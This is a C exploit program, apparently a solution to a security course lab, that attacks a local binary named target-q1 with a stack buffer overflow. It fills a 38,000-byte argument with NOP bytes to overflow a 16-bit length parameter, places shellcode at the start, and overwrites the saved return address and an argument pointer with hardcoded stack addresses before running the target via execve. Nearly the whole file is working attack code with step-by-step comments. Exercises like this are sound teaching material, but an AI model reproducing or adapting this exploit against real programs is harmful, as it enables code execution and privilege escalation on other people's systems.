#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h" 


#define TARGET "/home/maluser/Q1/target-q1"

int main(void)
{
  char *args[3];
  char *env[2];
  
  /* The buffer that gets passed in to target.
   * Needs to be bigger than SHRT_MAX: 32767 to overflow
   * the 'short arglen' parameter passed to foo().
   */
  char exploit_str[38000];

  int idx;

  /* Fill in nops. */
  for(idx = 0; idx < 38000; idx++){
    exploit_str[idx] = 0x90;
  }

  exploit_str[37999] = '\0';

  /* Copy in the attack shellcode to the start of the buffer. */
  memcpy(exploit_str, shellcode, 45);

  /* The return address (stored $eip value) is 108 bytes from the 
   * start of buf in target-q1. Overwrite that location with the address
   * of the start of buf in target-q1 (which is where the shellcode is located. */
  int *ret_addr = (int *) &exploit_str[108];
  *ret_addr = 0xbfff6960;

  /* Rewrite the value of the args' location to avoid crashing. */
  int *orig_arg = (int *) &exploit_str[112];
  *orig_arg = 0xbfff6b70;

  args[0] = TARGET; 
  //  args[1] = "hi there"; 
  args[1] = exploit_str;
  args[2] = NULL;
  
  env[0] = "FOO=bar"; env[1] = NULL;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}